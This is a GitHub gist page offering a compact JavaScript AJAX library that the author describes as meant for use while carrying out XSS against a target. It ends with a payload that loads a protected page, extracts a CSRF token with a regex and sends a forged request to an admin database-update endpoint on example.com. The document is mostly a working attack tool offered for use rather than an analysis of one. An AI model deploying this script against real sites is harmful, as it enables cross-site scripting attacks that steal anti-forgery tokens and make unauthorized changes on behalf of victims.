Created
February 5, 2013 09:48
-
-
Save nmcv/4713391 to your computer and use it in GitHub Desktop.
AJAX routines stub - a bunch of JS which helps do something via AJAX (like posting a form, fetching URL into a buffer, etc.) while XSS'ing your target. No need to tote full jQuery or sort of if you need just the basic AJAX routines.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| function $(e) { | |
| if(typeof e == 'string') e = document.getElementById(e); | |
| return e | |
| }; | |
| function collect(a, f) { | |
| var n = []; | |
| for(var i = 0; i < a.length; i++) { | |
| var v = f(a[i]); | |
| if(v != null) n.push(v) | |
| } | |
| return n | |
| }; | |
| ajax = {}; | |
| ajax.x = function() { | |
| try { | |
| return new ActiveXObject('Msxml2.XMLHTTP') | |
| } catch(e) { | |
| try { | |
| return new ActiveXObject('Microsoft.XMLHTTP') | |
| } catch(e) { | |
| return new XMLHttpRequest() | |
| } | |
| } | |
| }; | |
| ajax.serialize = function(f) { | |
| var g = function(n) { | |
| return f.getElementsByTagName(n) | |
| }; | |
| var nv = function(e) { | |
| if(e.name) return encodeURIComponent(e.name) + '=' + encodeURIComponent(e.value); | |
| else return '' | |
| }; | |
| var i = collect(g('input'), function(i) { | |
| if((i.type != 'radio' && i.type != 'checkbox') || i.checked) return nv(i) | |
| }); | |
| var s = collect(g('select'), nv); | |
| var t = collect(g('textarea'), nv); | |
| return i.concat(s).concat(t).join('&'); | |
| }; | |
| ajax.send = function(u, f, m, a) { | |
| var x = ajax.x(); | |
| x.open(m, u, true); | |
| x.onreadystatechange = function() { | |
| if(x.readyState == 4) f(x.responseText) | |
| }; | |
| if(m == 'POST') x.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); | |
| x.send(a) | |
| }; | |
| ajax.get = function(url, func) { | |
| ajax.send(url, func, 'GET') | |
| }; | |
| ajax.gets = function(url) { | |
| var x = ajax.x(); | |
| x.open('GET', url, false); | |
| x.send(null); | |
| return x.responseText | |
| }; | |
| ajax.post = function(url, func, args) { | |
| ajax.send(url, func, 'POST', args) | |
| }; | |
| ajax.update = function(url, elm) { | |
| var e = $(elm); | |
| var f = function(r) { | |
| e.innerHTML = r | |
| }; | |
| ajax.get(url, f) | |
| }; | |
| ajax.submit = function(url, elm, frm) { | |
| var e = $(elm); | |
| var f = function(r) { | |
| e.innerHTML = r | |
| }; | |
| ajax.post(url, f, ajax.serialize(frm)) | |
| }; | |
| // Payload | |
| ajax.get('http://example.com/secret_page.php', function(buf) { | |
| csrf = buf.match(/[a-f0-9]{32}/); | |
| ajax.get("http://example.com/update_database.php?user=admin&csrftoken=" + csrf, | |
| function(buf2) { console.log(buf2) }); | |
| }); | |
| </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment